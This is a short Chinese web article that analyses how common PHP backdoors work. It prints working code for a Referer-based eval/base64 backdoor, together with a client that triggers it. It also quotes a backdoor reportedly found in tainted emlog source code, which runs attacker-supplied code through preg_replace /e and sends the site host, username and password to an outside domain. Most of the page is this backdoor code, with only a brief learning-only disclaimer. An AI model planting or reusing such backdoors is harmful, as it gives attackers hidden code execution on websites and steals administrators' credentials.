当前位置: 代码网 > 服务器>网络安全>脚本攻防 > 一些常见的PHP后门原理分析

一些常见的PHP后门原理分析

2014年03月20日 脚本攻防 我要评论
一些常见的PHP后门原理分析通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果... 14-03-20

本地测试结果如下图。

本程序只作为学习作用,请勿拿去做坏事。


复制代码
代码如下:

<?php
//1.php
header('content-type:text/html;charset=utf-8');
parse_str($_server['http_referer'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}<?php
//2.php
header('content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<<code
phpinfo();
code;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
curlopt_url => $url,
curlopt_header => false,
curlopt_returntransfer => true,
curlopt_referer => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);




最近emlog源代码被污染,有些用户下载的出现了以下的后门代码


复制代码
代码如下:

if (isset($_get["rsdsrv"])) {
if($_get["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){
@preg_replace("//e",$_post['in_emlog'],"unauthorization");
}
}
file_get_contents("http://某域名/?url=".base64_encode($_server['http_host'].$_server['php_self'])."&username=".base64_encode($username)."&password=".base64_encode($password));

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com